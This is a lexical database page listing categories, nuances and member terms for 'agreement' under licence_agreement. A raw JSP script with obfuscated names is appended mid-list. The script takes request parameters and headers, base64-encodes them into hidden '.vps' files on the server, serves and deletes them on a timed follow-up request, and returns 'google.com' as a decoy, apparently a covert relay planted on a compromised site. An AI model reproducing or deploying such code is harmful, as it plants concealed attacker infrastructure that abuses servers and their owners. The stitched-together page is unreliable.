Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
licence_agreement
with head word
agreement
:
commercial:agreement,
Category Nuances matching
agreement
:
ancillary,
corporate,
formal,
written,
promotional,
working,
covered,
global,
complex,
additional,
commercial,
contractual,
external,
legal,
internal,
political,
private,
general,
enforceable,
outside,
relevant,
national,
governing,
legitimate,
binding,
multilateral,
voluntary,
world,
useful,
official,
bilateral,
economic,
institutional,
key,
financial,
individual,
international,
special,
environmental,
operational,
underlying,
everyday,
major,
simple,
related,
important,
regional,
collaborative,
historical,
explicit,
current,
cooperative,
Members for simple category
agreement
:
lease,
service_agreement,
contract,
investment_agreement,
aarhus_convention,
nonproliferation_treaty,
separation_agreement,
treaty,
research_contract,
planning_condition,
cooperative_agreement,
recording_agreement,
grant,
shareholder_agreement,
obligation,
joint_statement,
alpine_convention,
bond_indenture,
covenant,
berne_convention,
confidentiality_agreement,
abm_treaty,
wto_agreement,
supply_agreement,
new_partnership,
label_agreement,
condition,
insurance,
franchise,
setoff_agreement,
lease_agreement,
letter,
un_convention,
convention,
provisions,
cohabitation_agreement,
return_policy,
peace_agreement,
release,
revenue-sharing_agreement,
participation_agreement,
scholarship_agreement,
free-trade_agreement,
confidentiality_contract,
notice,
rome_declaration,
security_agreement,
trust_agreement,
charter,
readmission_agreement,
spot_sale,
concession_agreement,
peace,
annexation_agreement,
trip_agreement,
termination_agreement,
licence_agreement,
consultancy_agreement,
loan_contract,
prosperity_partnership,
rio_treaty,
potsdam_declaration,
oas_convention,
production_partnership,
signed_lease,
green_lease,
basel_convention,
land-mine_treaty,
model_release,
balkan_agreement,
note,
artist_contract,
star_alliance,
chisinau_convention,
forbearance_agreement,
retention_agreement,
credit_provisions,
project_arrangement,
contribution_agreement,
management_contract,
declaration,
wildlife_agreement,
settlement_agreement,
distribution_contract,
restrictive_covenant,
contractual_agreement,
hedge_agreement,
sale,
extradition_treaty,
carbon_contract,
depository_program,
rio_declaration,
james-bay_agreement,
court_settlement,
promissory_note,
subordinate_contract,
escrow,
financing_agreement,
written_sop,
repurchase_agreement,
strategic_alliance,
corporate_resolution,
intellectual-property_agreement,
un_charter,
transition_agreement,
technology_agreement,
dispute_resolution,
sales,
range_agreement,
andean_pact,
credit_agreement,
debt,
water_agreement,
rapid_response,
biosphere_programme,
software_agreement,
country_pact,
andean_community,
forward_contract,
compact,
biodiversity_convention,
alliance,
subscription_agreement,
international_treaty,
burial_contract,
maintenance_contract,
paris_convention,
benelux_agreement,
agency_agreement,
protection_agreement,
framework_convention,
stockholm_convention,
individual_contract,
premarital_agreement,
formal_contract,
annuity_contract,
customer_contract,
genocide_convention,
union_agreement,
conservation_covenant,
tax_treaty,
tenancy_agreement,
climate-change_convention,
development_agreement,
stabilisation_agreement,
cohabitation_contract,
apartment_lease,
prenuptial_contract,
divorce_settlement,
work_contract,
bond_covenant,
enforceable_contract,
rental_lease,
commission_agreement,
business_contract,
doha_agreement,
interim_agreement,
international_sales,
bamako_convention,
bilateral_agreement,
biosafety_agreement,
peru_agreement,
vienna_declaration,
climate_convention,
antarctic_convention,
universal,
phase_lease,
telecommunication_pact,
subdivision_covenant,
cooperation_agreement,
escrow_agreement,
multilateral_treaty,
privacy_policy,
casual_agreement,
audit_agreement,
damage_claim,
resolution,
monterrey_consensus,
loan_agreement,
security-council_resolution,
stipulation,
antarctic_treaty,
asset_sale,
intellectual-property_convention,
concession,
interstate_compact,
testing_agreement,
chemical-weapon_convention,
business_sale,
rental_contract,
multilateral_convention,
virtual_contract,
domestic_contract,
capitation_contract,
consumer_contract,
industrial_agreement,
secrecy_agreement,
legal_agreement,
life-insurance_policy,
paternity_agreement,
credit,
partnership_agreement,
gallery_agreement,
voting_agreement,
power_sales,
franchise_agreement,
letter_agreement,
letting_agreement,
employee_agreement,
gatt_agreement,
corporate_partnership,
maintenance_agreement,
commodity_agreement,
pop_convention,
collective-bargaining_agreement,
lisbon_convention,
railroad_lease,
sales_contract,
employee_contract,
commercial-agency_agreement,
lending_agreement,
doha_declaration,
programme,
trade_agreement,
wto_accession,
infrastructure_agreement,
portal_agreement,
labour_agreement,
helsinki_convention,
sale_agreement,
construction_contract,
municipality_agreement,
partnership,
various_convention,
land_contract,
license_agreement,
trust_indenture,
veterinary_agreement,
lockup_agreement,
consulting_agreement,
master_agreement,
consortium_agreement,
management_agreement,
participant_agreement,
flexible_agreement,
limited_partnership,
radio_contract,
terms,
share_sale,
executive_agreement,
technology_sales,
discretionary_grant,
project_agreement,
royalty_arrangement,
ilo_convention,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>